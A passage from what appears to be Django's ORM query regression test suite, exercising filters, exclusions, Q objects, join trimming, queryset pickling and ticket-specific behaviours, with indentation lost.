if {'a': 1, 'b': 2}.keys() == ['a', 'b']:
s.reverse()
params.reverse()
# This slightly odd comparison works around the fact that PostgreSQL will
# return 'one' and 'two' as strings, not Unicode objects. It's a side-effect of
# using constants here and not a real concern.
d = Item.objects.extra(select=OrderedDict(s), select_params=params).values('a', 'b')[0]
self.assertEqual(d, {'a': 'one', 'b': 'two'})
# Order by the number of tags attached to an item.
l = Item.objects.extra(select={'count': 'select count(*) from queries_item_tags where queries_item_tags.item_id = queries_item.id'}).order_by('-count')
self.assertEqual([o.count for o in l], [2, 2, 1, 0])
def test_ticket6154(self):
# Multiple filter statements are joined using "AND" all the time.
self.assertQuerysetEqual(
Author.objects.filter(id=self.a1.id).filter(Q(extra__note=self.n1) | Q(item__note=self.n3)),
['<Author: a1>']
)
self.assertQuerysetEqual(
Author.objects.filter(Q(extra__note=self.n1) | Q(item__note=self.n3)).filter(id=self.a1.id),
['<Author: a1>']
)
def test_ticket6981(self):
self.assertQuerysetEqual(
Tag.objects.select_related('parent').order_by('name'),
['<Tag: t1>', '<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>']
)
def test_ticket9926(self):
self.assertQuerysetEqual(
Tag.objects.select_related("parent", "category").order_by('name'),
['<Tag: t1>', '<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>']
)
self.assertQuerysetEqual(
Tag.objects.select_related('parent', "parent__category").order_by('name'),
['<Tag: t1>', '<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>']
)
def test_tickets_6180_6203(self):
# Dates with limits and/or counts
self.assertEqual(Item.objects.count(), 4)
self.assertEqual(Item.objects.datetimes('created', 'month').count(), 1)
self.assertEqual(Item.objects.datetimes('created', 'day').count(), 2)
self.assertEqual(len(Item.objects.datetimes('created', 'day')), 2)
self.assertEqual(Item.objects.datetimes('created', 'day')[0], datetime.datetime(2007, 12, 19, 0, 0))
def test_tickets_7087_12242(self):
# Dates with extra select columns
self.assertQuerysetEqual(
Item.objects.datetimes('created', 'day').extra(select={'a': 1}),
['datetime.datetime(2007, 12, 19, 0, 0)', 'datetime.datetime(2007, 12, 20, 0, 0)']
)
self.assertQuerysetEqual(
Item.objects.extra(select={'a': 1}).datetimes('created', 'day'),
['datetime.datetime(2007, 12, 19, 0, 0)', 'datetime.datetime(2007, 12, 20, 0, 0)']
)
name = "one"
self.assertQuerysetEqual(
Item.objects.datetimes('created', 'day').extra(where=['name=%s'], params=[name]),
['datetime.datetime(2007, 12, 19, 0, 0)']
)
self.assertQuerysetEqual(
Item.objects.extra(where=['name=%s'], params=[name]).datetimes('created', 'day'),
['datetime.datetime(2007, 12, 19, 0, 0)']
)
def test_ticket7155(self):
# Nullable dates
self.assertQuerysetEqual(
Item.objects.datetimes('modified', 'day'),
['datetime.datetime(2007, 12, 19, 0, 0)']
)
def test_ticket7098(self):
# Make sure semi-deprecated ordering by related models syntax still
# works.
self.assertValueQuerysetEqual(
Item.objects.values('note__note').order_by('queries_note.note', 'id'),
[{'note__note': 'n2'}, {'note__note': 'n3'}, {'note__note': 'n3'}, {'note__note': 'n3'}]
)
def test_ticket7096(self):
# Make sure exclude() with multiple conditions continues to work.
self.assertQuerysetEqual(
Tag.objects.filter(parent=self.t1, name='t3').order_by('name'),
['<Tag: t3>']
)
self.assertQuerysetEqual(
Tag.objects.exclude(parent=self.t1, name='t3').order_by('name'),
['<Tag: t1>', '<Tag: t2>', '<Tag: t4>', '<Tag: t5>']
)
self.assertQuerysetEqual(
Item.objects.exclude(tags__name='t1', name='one').order_by('name').distinct(),
['<Item: four>', '<Item: three>', '<Item: two>']
)
self.assertQuerysetEqual(
Item.objects.filter(name__in=['three', 'four']).exclude(tags__name='t1').order_by('name'),
['<Item: four>', '<Item: three>']
)
# More twisted cases, involving nested negations.
self.assertQuerysetEqual(
Item.objects.exclude(~Q(tags__name='t1', name='one')),
['<Item: one>']
)
self.assertQuerysetEqual(
Item.objects.filter(~Q(tags__name='t1', name='one'), name='two'),
['<Item: two>']
)
self.assertQuerysetEqual(
Item.objects.exclude(~Q(tags__name='t1', name='one'), name='two'),
['<Item: four>', '<Item: one>', '<Item: three>']
)
def test_tickets_7204_7506(self):
# Make sure querysets with related fields can be pickled. If this
# doesn't crash, it's a Good Thing.
pickle.dumps(Item.objects.all())
def test_ticket7813(self):
# We should also be able to pickle things that use select_related().
# The only tricky thing here is to ensure that we do the related
# selections properly after unpickling.
qs = Item.objects.select_related()
query = qs.query.get_compiler(qs.db).as_sql()[0]
query2 = pickle.loads(pickle.dumps(qs.query))
self.assertEqual(
query2.get_compiler(qs.db).as_sql()[0],
query
)
def test_deferred_load_qs_pickling(self):
# Check pickling of deferred-loading querysets
qs = Item.objects.defer('name', 'creator')
q2 = pickle.loads(pickle.dumps(qs))
self.assertEqual(list(qs), list(q2))
q3 = pickle.loads(pickle.dumps(qs, pickle.HIGHEST_PROTOCOL))
self.assertEqual(list(qs), list(q3))
def test_ticket7277(self):
self.assertQuerysetEqual(
self.n1.annotation_set.filter(Q(tag=self.t5) | Q(tag__children=self.t5) | Q(tag__children__children=self.t5)),
['<Annotation: a1>']
)
def test_tickets_7448_7707(self):
# Complex objects should be converted to strings before being used in
# lookups.
self.assertQuerysetEqual(
Item.objects.filter(created__in=[self.time1, self.time2]),
['<Item: one>', '<Item: two>']
)
def test_ticket7235(self):
# An EmptyQuerySet should not raise exceptions if it is filtered.
Eaten.objects.create(meal='m')
q = Eaten.objects.none()
with self.assertNumQueries(0):
self.assertQuerysetEqual(q.all(), [])
self.assertQuerysetEqual(q.filter(meal='m'), [])
self.assertQuerysetEqual(q.exclude(meal='m'), [])
self.assertQuerysetEqual(q.complex_filter({'pk': 1}), [])
self.assertQuerysetEqual(q.select_related('food'), [])
self.assertQuerysetEqual(q.annotate(Count('food')), [])
self.assertQuerysetEqual(q.order_by('meal', 'food'), [])
self.assertQuerysetEqual(q.distinct(), [])
self.assertQuerysetEqual(
q.extra(select={'foo': "1"}),
[]
)
q.query.low_mark = 1
self.assertRaisesMessage(
AssertionError,
'Cannot change a query once a slice has been taken',
q.extra, select={'foo': "1"}
)
self.assertQuerysetEqual(q.reverse(), [])
self.assertQuerysetEqual(q.defer('meal'), [])
self.assertQuerysetEqual(q.only('meal'), [])
def test_ticket7791(self):
# There were "issues" when ordering and distinct-ing on fields related
# via ForeignKeys.
self.assertEqual(
len(Note.objects.order_by('extrainfo__info').distinct()),
3
)
# Pickling of DateQuerySets used to fail
qs = Item.objects.datetimes('created', 'month')
pickle.loads(pickle.dumps(qs))
def test_ticket9997(self):
# If a ValuesList or Values queryset is passed as an inner query, we
# make sure it's only requesting a single value and use that as the
# thing to select.
self.assertQuerysetEqual(
Tag.objects.filter(name__in=Tag.objects.filter(parent=self.t1).values('name')),
['<Tag: t2>', '<Tag: t3>']
)
# Multi-valued values() and values_list() querysets should raise errors.
self.assertRaisesMessage(
TypeError,
'Cannot use multi-field values as a filter value.',
lambda: Tag.objects.filter(name__in=Tag.objects.filter(parent=self.t1).values('name', 'id'))
)
self.assertRaisesMessage(
TypeError,
'Cannot use multi-field values as a filter value.',
lambda: Tag.objects.filter(name__in=Tag.objects.filter(parent=self.t1).values_list('name', 'id'))
)
def test_ticket9985(self):
# qs.values_list(...).values(...) combinations should work.
self.assertValueQuerysetEqual(
Note.objects.values_list("note", flat=True).values("id").order_by("id"),
[{'id': 1}, {'id': 2}, {'id': 3}]
)
self.assertQuerysetEqual(
Annotation.objects.filter(notes__in=Note.objects.filter(note="n1").values_list('note').values('id')),
['<Annotation: a1>']
)
def test_ticket10205(self):
# When bailing out early because of an empty "__in" filter, we need
# to set things up correctly internally so that subqueries can continue properly.
self.assertEqual(Tag.objects.filter(name__in=()).update(name="foo"), 0)
def test_ticket10432(self):
# Testing an empty "__in" filter with a generator as the value.
def f():
return iter([])
n_obj = Note.objects.all()[0]
def g():
for i in [n_obj.pk]:
yield i
self.assertQuerysetEqual(Note.objects.filter(pk__in=f()), [])
self.assertEqual(list(Note.objects.filter(pk__in=g())), [n_obj])
def test_ticket10742(self):
# Queries used in an __in clause don't execute subqueries
subq = Author.objects.filter(num__lt=3000)
qs = Author.objects.filter(pk__in=subq)
self.assertQuerysetEqual(qs, ['<Author: a1>', '<Author: a2>'])
# The subquery result cache should not be populated
self.assertIsNone(subq._result_cache)
subq = Author.objects.filter(num__lt=3000)
qs = Author.objects.exclude(pk__in=subq)
self.assertQuerysetEqual(qs, ['<Author: a3>', '<Author: a4>'])
# The subquery result cache should not be populated
self.assertIsNone(subq._result_cache)
subq = Author.objects.filter(num__lt=3000)
self.assertQuerysetEqual(
Author.objects.filter(Q(pk__in=subq) & Q(name='a1')),
['<Author: a1>']
)
# The subquery result cache should not be populated
self.assertIsNone(subq._result_cache)
def test_ticket7076(self):
# Excluding shouldn't eliminate NULL entries.
self.assertQuerysetEqual(
Item.objects.exclude(modified=self.time1).order_by('name'),
['<Item: four>', '<Item: three>', '<Item: two>']
)
self.assertQuerysetEqual(
Tag.objects.exclude(parent__name=self.t1.name),
['<Tag: t1>', '<Tag: t4>', '<Tag: t5>']
)
def test_ticket7181(self):
# Ordering by related tables should accommodate nullable fields (this
# test is a little tricky, since NULL ordering is database dependent.
# Instead, we just count the number of results).
self.assertEqual(len(Tag.objects.order_by('parent__name')), 5)
# Empty querysets can be merged with others.
self.assertQuerysetEqual(
Note.objects.none() | Note.objects.all(),
['<Note: n1>', '<Note: n2>', '<Note: n3>']
)
self.assertQuerysetEqual(
Note.objects.all() | Note.objects.none(),
['<Note: n1>', '<Note: n2>', '<Note: n3>']
)
self.assertQuerysetEqual(Note.objects.none() & Note.objects.all(), [])
self.assertQuerysetEqual(Note.objects.all() & Note.objects.none(), [])
def test_ticket9411(self):
# Make sure bump_prefix() (an internal Query method) doesn't (re-)break. It's
# sufficient that this query runs without error.
qs = Tag.objects.values_list('id', flat=True).order_by('id')
qs.query.bump_prefix(qs.query)
first = qs[0]
self.assertEqual(list(qs), list(range(first, first + 5)))
def test_ticket8439(self):
# Complex combinations of conjunctions, disjunctions and nullable
# relations.
self.assertQuerysetEqual(
Author.objects.filter(Q(item__note__extrainfo=self.e2) | Q(report=self.r1, name='xyz')),
['<Author: a2>']
)
self.assertQuerysetEqual(
Author.objects.filter(Q(report=self.r1, name='xyz') | Q(item__note__extrainfo=self.e2)),
['<Author: a2>']
)
self.assertQuerysetEqual(
Annotation.objects.filter(Q(tag__parent=self.t1) | Q(notes__note='n1', name='a1')),
['<Annotation: a1>']
)
xx = ExtraInfo.objects.create(info='xx', note=self.n3)
self.assertQuerysetEqual(
Note.objects.filter(Q(extrainfo__author=self.a1) | Q(extrainfo=xx)),
['<Note: n1>', '<Note: n3>']
)
q = Note.objects.filter(Q(extrainfo__author=self.a1) | Q(extrainfo=xx)).query
self.assertEqual(
len([x for x in q.alias_map.values() if x.join_type == LOUTER and q.alias_refcount[x.table_alias]]),
1
)
def test_ticket17429(self):
"""
Ensure that Meta.ordering=None works the same as Meta.ordering=[]
"""
original_ordering = Tag._meta.ordering
Tag._meta.ordering = None
try:
self.assertQuerysetEqual(
Tag.objects.all(),
['<Tag: t1>', '<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>'],
ordered=False
)
finally:
Tag._meta.ordering = original_ordering
def test_exclude(self):
self.assertQuerysetEqual(
Item.objects.exclude(tags__name='t4'),
[repr(i) for i in Item.objects.filter(~Q(tags__name='t4'))])
self.assertQuerysetEqual(
Item.objects.exclude(Q(tags__name='t4') | Q(tags__name='t3')),
[repr(i) for i in Item.objects.filter(~(Q(tags__name='t4') | Q(tags__name='t3')))])
self.assertQuerysetEqual(
Item.objects.exclude(Q(tags__name='t4') | ~Q(tags__name='t3')),
[repr(i) for i in Item.objects.filter(~(Q(tags__name='t4') | ~Q(tags__name='t3')))])
def test_nested_exclude(self):
self.assertQuerysetEqual(
Item.objects.exclude(~Q(tags__name='t4')),
[repr(i) for i in Item.objects.filter(~~Q(tags__name='t4'))])
def test_double_exclude(self):
self.assertQuerysetEqual(
Item.objects.filter(Q(tags__name='t4')),
[repr(i) for i in Item.objects.filter(~~Q(tags__name='t4'))])
self.assertQuerysetEqual(
Item.objects.filter(Q(tags__name='t4')),
[repr(i) for i in Item.objects.filter(~Q(~Q(tags__name='t4')))])
def test_exclude_in(self):
self.assertQuerysetEqual(
Item.objects.exclude(Q(tags__name__in=['t4', 't3'])),
[repr(i) for i in Item.objects.filter(~Q(tags__name__in=['t4', 't3']))])
self.assertQuerysetEqual(
Item.objects.filter(Q(tags__name__in=['t4', 't3'])),
[repr(i) for i in Item.objects.filter(~~Q(tags__name__in=['t4', 't3']))])
def test_ticket_10790_1(self):
# Querying direct fields with isnull should trim the left outer join.
# It also should not create INNER JOIN.
q = Tag.objects.filter(parent__isnull=True)
self.assertQuerysetEqual(q, ['<Tag: t1>'])
self.assertNotIn('JOIN', str(q.query))
q = Tag.objects.filter(parent__isnull=False)
self.assertQuerysetEqual(
q,
['<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>'],
)
self.assertNotIn('JOIN', str(q.query))
q = Tag.objects.exclude(parent__isnull=True)
self.assertQuerysetEqual(
q,
['<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>'],
)
self.assertNotIn('JOIN', str(q.query))
q = Tag.objects.exclude(parent__isnull=False)
self.assertQuerysetEqual(q, ['<Tag: t1>'])
self.assertNotIn('JOIN', str(q.query))
q = Tag.objects.exclude(parent__parent__isnull=False)
self.assertQuerysetEqual(
q,
['<Tag: t1>', '<Tag: t2>', '<Tag: t3>'],
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
self.assertNotIn('INNER JOIN', str(q.query))
def test_ticket_10790_2(self):
# Querying across several tables should strip only the last outer join,
# while preserving the preceding inner joins.
q = Tag.objects.filter(parent__parent__isnull=False)
self.assertQuerysetEqual(
q,
['<Tag: t4>', '<Tag: t5>'],
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 1)
# Querying without isnull should not convert anything to left outer join.
q = Tag.objects.filter(parent__parent=self.t1)
self.assertQuerysetEqual(
q,
['<Tag: t4>', '<Tag: t5>'],
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 1)
def test_ticket_10790_3(self):
# Querying via indirect fields should populate the left outer join
q = NamedCategory.objects.filter(tag__isnull=True)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
# join to dumbcategory ptr_id
self.assertEqual(str(q.query).count('INNER JOIN'), 1)
self.assertQuerysetEqual(q, [])
# Querying across several tables should strip only the last join, while
# preserving the preceding left outer joins.
q = NamedCategory.objects.filter(tag__parent__isnull=True)
self.assertEqual(str(q.query).count('INNER JOIN'), 1)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
self.assertQuerysetEqual(q, ['<NamedCategory: Generic>'])
def test_ticket_10790_4(self):
# Querying across m2m field should not strip the m2m table from join.
q = Author.objects.filter(item__tags__isnull=True)
self.assertQuerysetEqual(
q,
['<Author: a2>', '<Author: a3>'],
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 2)
self.assertNotIn('INNER JOIN', str(q.query))
q = Author.objects.filter(item__tags__parent__isnull=True)
self.assertQuerysetEqual(
q,
['<Author: a1>', '<Author: a2>', '<Author: a2>', '<Author: a3>'],
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 3)
self.assertNotIn('INNER JOIN', str(q.query))
def test_ticket_10790_5(self):
# Querying with isnull=False across m2m field should not create outer joins
q = Author.objects.filter(item__tags__isnull=False)
self.assertQuerysetEqual(
q,
['<Author: a1>', '<Author: a1>', '<Author: a2>', '<Author: a2>', '<Author: a4>']
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 2)
q = Author.objects.filter(item__tags__parent__isnull=False)
self.assertQuerysetEqual(
q,
['<Author: a1>', '<Author: a2>', '<Author: a4>']
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 3)
q = Author.objects.filter(item__tags__parent__parent__isnull=False)
self.assertQuerysetEqual(
q,
['<Author: a4>']
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 4)
def test_ticket_10790_6(self):
# Querying with isnull=True across m2m field should not create inner joins
# and strip last outer join
q = Author.objects.filter(item__tags__parent__parent__isnull=True)
self.assertQuerysetEqual(
q,
['<Author: a1>', '<Author: a1>', '<Author: a2>', '<Author: a2>',
'<Author: a2>', '<Author: a3>']
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 4)
self.assertEqual(str(q.query).count('INNER JOIN'), 0)
q = Author.objects.filter(item__tags__parent__isnull=True)
self.assertQuerysetEqual(
q,
['<Author: a1>', '<Author: a2>', '<Author: a2>', '<Author: a3>']
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 3)
self.assertEqual(str(q.query).count('INNER JOIN'), 0)
def test_ticket_10790_7(self):
# Reverse querying with isnull should not strip the join
q = Author.objects.filter(item__isnull=True)
self.assertQuerysetEqual(
q,
['<Author: a3>']
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
self.assertEqual(str(q.query).count('INNER JOIN'), 0)
q = Author.objects.filter(item__isnull=False)
self.assertQuerysetEqual(
q,
['<Author: a1>', '<Author: a2>', '<Author: a2>', '<Author: a4>']
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 1)
def test_ticket_10790_8(self):
# Querying with combined q-objects should also strip the left outer join
q = Tag.objects.filter(Q(parent__isnull=True) | Q(parent=self.t1))
self.assertQuerysetEqual(
q,
['<Tag: t1>', '<Tag: t2>', '<Tag: t3>']
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 0)
def test_ticket_10790_combine(self):
# Combining queries should not re-populate the left outer join
q1 = Tag.objects.filter(parent__isnull=True)
q2 = Tag.objects.filter(parent__isnull=False)
q3 = q1 | q2
self.assertQuerysetEqual(
q3,
['<Tag: t1>', '<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>'],
)
self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
q3 = q1 & q2
self.assertQuerysetEqual(q3, [])
self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
q2 = Tag.objects.filter(parent=self.t1)
q3 = q1 | q2
self.assertQuerysetEqual(
q3,
['<Tag: t1>', '<Tag: t2>', '<Tag: t3>']
)
self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
q3 = q2 | q1
self.assertQuerysetEqual(
q3,
['<Tag: t1>', '<Tag: t2>', '<Tag: t3>']
)
self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
q1 = Tag.objects.filter(parent__isnull=True)
q2 = Tag.objects.filter(parent__parent__isnull=True)
q3 = q1 | q2
self.assertQuerysetEqual(
q3,
['<Tag: t1>', '<Tag: t2>', '<Tag: t3>']
)
self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 1)
self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
q3 = q2 | q1
self.assertQuerysetEqual(
q3,
['<Tag: t1>', '<Tag: t2>', '<Tag: t3>']
)
self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 1)
self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
def test_ticket19672(self):
self.assertQuerysetEqual(
Report.objects.filter(Q(creator__isnull=False) &
~Q(creator__extra__value=41)),
['<Report: r1>']
)
def test_ticket_20250(self):
# A negated Q along with an annotated queryset failed in Django 1.4
qs = Author.objects.annotate(Count('item'))
qs = qs.filter(~Q(extra__value=0))
self.assertIn('SELECT', str(qs.query))
self.assertQuerysetEqual(
qs,
['<Author: a1>', '<Author: a2>', '<Author: a3>', '<Author: a4>']
)
def test_lookup_constraint_fielderror(self):
msg = (
"Cannot resolve keyword 'unknown_field' into field. Choices are: "
"annotation, category, category_id, children, id, item, "
"managedmodel, name, parent, parent_id"
)
with self.assertRaisesMessage(FieldError, msg):
Tag.objects.filter(unknown_field__name='generic')
class Queries2Tests(TestCase):
@classmethod
def setUpTestData(cls):
Number.objects.create(num=4)
Number.objects.create(num=8)
Number.objects.create(num=12)
def test_ticket4289(self):
# A slight variation on the restricting the filtering choices by the
# lookup constraints.
self.assertQuerysetEqual(Number.objects.filter(num__lt=4), [])
self.assertQuerysetEqual(Number.objects.filter(num__gt=8, num__lt=12), [])
self.assertQuerysetEqual(
Number.objects.filter(num__gt=8, num__lt=13),
['<Number: 12>']
)
self.assertQuerysetEqual(
Number.objects.filter(Q(num__lt=4) | Q(num__gt=8, num__lt=12)),
[]
)
self.assertQuerysetEqual(
Number.objects.filter(Q(num__gt=8, num__lt=12) | Q(num__lt=4)),
[]
)
self.assertQuerysetEqual(
Number.objects.filter(Q(num__gt=8) & Q(num__lt=12) | Q(num__lt=4)),
[]
)
self.assertQuerysetEqual(
Number.objects.filter(Q(num__gt=7) & Q(num__lt=12) | Q(num__lt=4)),
['<Number: 8>']
)
def test_ticket12239(self):
# Float was being rounded to integer on gte queries on integer field. Tests
# show that gt, lt, gte, and lte work as desired. Note that the fix changes
# get_prep_lookup for gte and lt queries only.
self.assertQuerysetEqual(
Number.objects.filter(num__gt=11.9),
['<Number: 12>']
)
self.assertQuerysetEqual(Number.objects.filter(num__gt=12), [])
self.assertQuerysetEqual(Number.objects.filter(num__gt=12.0), [])
self.assertQuerysetEqual(Number.objects.filter(num__gt=12.1), [])
self.assertQuerysetEqual(
Number.objects.filter(num__lt=12),
['<Number: 4>', '<Number: 8>'],
ordered=False
)
self.assertQuerysetEqual(
Number.objects.filter(num__lt=12.0),
['<Number: 4>', '<Number: 8>'],
ordered=False
)
self.assertQuerysetEqual(
Number.objects.filter(num__lt=12.1),
['<Number: 4>', '<Number: 8>', '<Number: 12>'],
ordered=False
)
self.assertQuerysetEqual(
Number.objects.filter(num__gte=11.9),
['<Number: 12>']
)
self.assertQuerysetEqual(
Number.objects.filter(num__gte=12),
['<Number: 12>']
)
self.assertQuerysetEqual(
Number.objects.filter(num__gte=12.0),
['<Number: 12>']
)
self.assertQuerysetEqual(Number.objects.filter(num__gte=12.1), [])
self.assertQuerysetEqual(Number.objects.filter(num__gte=12.9), [])
self.assertQuerysetEqual(
Number.objects.filter(num__lte=11.9),
['<Number: 4>', '<Number: 8>'],
ordered=False
)
self.assertQuerysetEqual(
Number.objects.filter(num__lte=12),
['<Number: 4>', '<Number: 8>', '<Number: 12>'],
ordered=False
)
self.assertQuerysetEqual(
Number.objects.filter(num__lte=12.0),
['<Number: 4>', '<Number: 8>', '<Number: 12>'],
ordered=False
)
self.assertQuerysetEqual(
Number.objects.filter(num__lte=12.1),
['<Number: 4>', '<Number: 8>', '<Number: 12>'],
ordered=False
)
self.assertQuerysetEqual(
Number.objects.filter(num__lte=12.9),
['<Number: 4>', '<Number: 8>', '<Number: 12>'],
ordered=False
)
def test_ticket7759(self):
# Count should work with a partially read result set.
count = Number.objects.count()
qs = Number.objects.all()
def run():
for obj in qs:
return qs.count() == count
self.assertTrue(run())
class Queries3Tests(BaseQuerysetTest):
def test_ticket7107(self):
# This shouldn't create an infinite loop.
self.assertQuerysetEqual(Valid.objects.all(), [])
def test_ticket8683(self):
# Raise proper error when a DateQuerySet gets passed a wrong type of
# field
self.assertRaisesMessage(
AssertionError,
"'name' isn't a DateTimeField.",
Item.objects.datetimes, 'name', 'month'
)
def test_ticket22023(self):
with self.assertRaisesMessage(TypeError,
"Cannot call only() after .values() or .values_list()"):
Valid.objects.values().only()
with self.assertRaisesMessage(TypeError,
"Cannot call defer() after .values() or .values_list()"):
Valid.objects.values().defer()
class Queries4Tests(BaseQuerysetTest):
@classmethod
def setUpTestData(cls):
generic = NamedCategory.objects.create(name="Generic")
cls.t1 = Tag.objects.create(name='t1', category=generic)
n1 = Note.objects.create(note='n1', misc='foo', id=1)
n2 = Note.objects.create(note='n2', misc='bar', id=2)
e1 = ExtraInfo.objects.create(info='e1', note=n1)
e2 = ExtraInfo.objects.create(info='e2', note=n2)
cls.a1 = Author.objects.create(name='a1', num=1001, extra=e1)
cls.a3 = Author.objects.create(name='a3', num=3003, extra=e2)
cls.r1 = Report.objects.create(name='r1', creator=cls.a1)
cls.r2 = Report.objects.create(name='r2', creator=cls.a3)
cls.r3 = Report.objects.create(name='r3')
Item.objects.create(name='i1', created=datetime.datetime.now(), note=n1, creator=cls.a1)
Item.objects.create(name='i2', created=datetime.datetime.now(), note=n1, creator=cls.a3)
def test_ticket11811(self):
unsaved_category = NamedCategory(name="Other")
with six.assertRaisesRegex(self, ValueError,
'Unsaved model instance <NamedCategory: Other> '
'cannot be used in an ORM query.'):
Tag.objects.filter(pk=self.t1.pk).update(category=unsaved_category)
def test_ticket14876(self):
# Note: when combining the query we need to have information available
# about the join type of the trimmed "creator__isnull" join. If we
# don't have that information, then the join is created as INNER JOIN
# and results will be incorrect.
q1 = Report.objects.filter(Q(creator__isnull=True) | Q(creator__extra__info='e1'))
q2 = Report.objects.filter(Q(creator__isnull=True)) | Report.objects.filter(Q(creator__extra__info='e1'))
self.assertQuerysetEqual(q1, ["<Report: r1>", "<Report: r3>"], ordered=False)
self.assertEqual(str(q1.query), str(q2.query))
q1 = Report.objects.filter(Q(creator__extra__info='e1') | Q(creator__isnull=True))
q2 = Report.objects.filter(Q(creator__extra__info='e1')) | Report.objects.filter(Q(creator__isnull=True))
self.assertQuerysetEqual(q1, ["<Report: r1>", "<Report: r3>"], ordered=False)
self.assertEqual(str(q1.query), str(q2.query))
q1 = Item.objects.filter(Q(creator=self.a1) | Q(creator__report__name='r1')).order_by()
q2 = Item.objects.filter(Q(creator=self.a1)).order_by() | Item.objects.filter(Q(creator__report__name='r1')).order_by()
self.assertQuerysetEqual(q1, ["<Item: i1>"])
self.assertEqual(str(q1.query), str(q2.query))
q1 = Item.objects.filter(Q(creator__report__name='e1') | Q(creator=self.a1)).order_by()
q2 = Item.objects.filter(Q(creator__report__name='e1')).order_by() | Item.objects.filter(Q(creator=self.a1)).order_by()
self.assertQuerysetEqual(q1, ["<Item: i1>"])
self.assertEqual(str(q1.query), str(q2.query))
def test_combine_join_reuse(self):
# Test that we correctly recreate joins having identical connections
# in the rhs query, in case the query is ORed together. Related to
# ticket #18748
Report.objects.create(name='r4', creator=self.a1)
q1 = Author.objects.filter(report__name='r5')
q2 = Author.objects.filter(report__name='r4').filter(report__name='r1')
combined = q1 | q2
self.assertEqual(str(combined.query).count('JOIN'), 2)
self.assertEqual(len(combined), 1)
self.assertEqual(combined[0].name, 'a1')
def test_ticket7095(self):
# Updates that are filtered on the model being updated are somewhat
# tricky in MySQL. This exercises that case.
ManagedModel.objects.create(data='mm1', tag=self.t1, public=True)
self.assertEqual(ManagedModel.objects.update(data='mm'), 1)
# A values() or values_list() query across joined models must use outer
# joins appropriately.
# Note: In Oracle, we expect a null CharField to return '' instead of
# None.
if connection.features.interprets_empty_strings_as_nulls:
expected_null_charfield_repr = ''
else:
expected_null_charfield_repr = None
self.assertValueQuerysetEqual(
Report.objects.values_list("creator__extra__info", flat=True).order_by("name"),
['e1', 'e2', expected_null_charfield_repr],
)
# Similarly for select_related(), joins beyond an initial nullable join
# must use outer joins so that all results are included.
self.assertQuerysetEqual(
Report.objects.select_related("creator", "creator__extra").order_by("name"),
['<Report: r1>', '<Report: r2>', '<Report: r3>']
)
# When there are multiple paths to a table from another table, we have
# to be careful not to accidentally reuse an inappropriate join when
# using select_related(). We used to return the parent's Detail record
# here by mistake.
d1 = Detail.objects.create(data="d1")
d2 = Detail.objects.create(data="d2")
m1 = Member.objects.create(name="m1", details=d1)
m2 = Member.objects.create(name="m2", details=d2)
Child.objects.create(person=m2, parent=m1)
obj = m1.children.select_related("person__details")[0]
self.assertEqual(obj.person.details.data, 'd2')
def test_order_by_resetting(self):
# Calling order_by() with no parameters removes any existing ordering on the
# model. But it should still be possible to add new ordering after that.
qs = Author.objects.order_by().order_by('name')
self.assertIn('ORDER BY', qs.query.get_compiler(qs.db).as_sql()[0])
def test_order_by_reverse_fk(self):
# It is possible to order by reverse of foreign key, although that can lead
# to duplicate results.
c1 = SimpleCategory.objects.create(name="category1")
c2 = SimpleCategory.objects.create(name="category2")
CategoryItem.objects.create(category=c1)
CategoryItem.objects.create(category=c2)
CategoryItem.objects.create(category=c1)
self.assertQuerysetEqual(
SimpleCategory.objects.order_by('categoryitem', 'pk'),
[c1, c2, c1], lambda x: x)
def test_ticket10181(self):
# Avoid raising an EmptyResultSet if an inner query is probably
# empty (and hence, not executed).
self.assertQuerysetEqual(
Tag.objects.filter(id__in=Tag.objects.filter(id__in=[])),
[]
)
def test_ticket15316_filter_false(self):
c1 = SimpleCategory.objects.create(name="category1")
c2 = SpecialCategory.objects.create(name="named category1",
special_name="special1")
c3 = SpecialCategory.objects.create(name="named category2",
special_name="special2")
CategoryItem.objects.create(category=c1)
ci2 = CategoryItem.objects.create(category=c2)
ci3 = CategoryItem.objects.create(category=c3)
qs = CategoryItem.objects.filter(category__specialcategory__isnull=False)
self.assertEqual(qs.count(), 2)
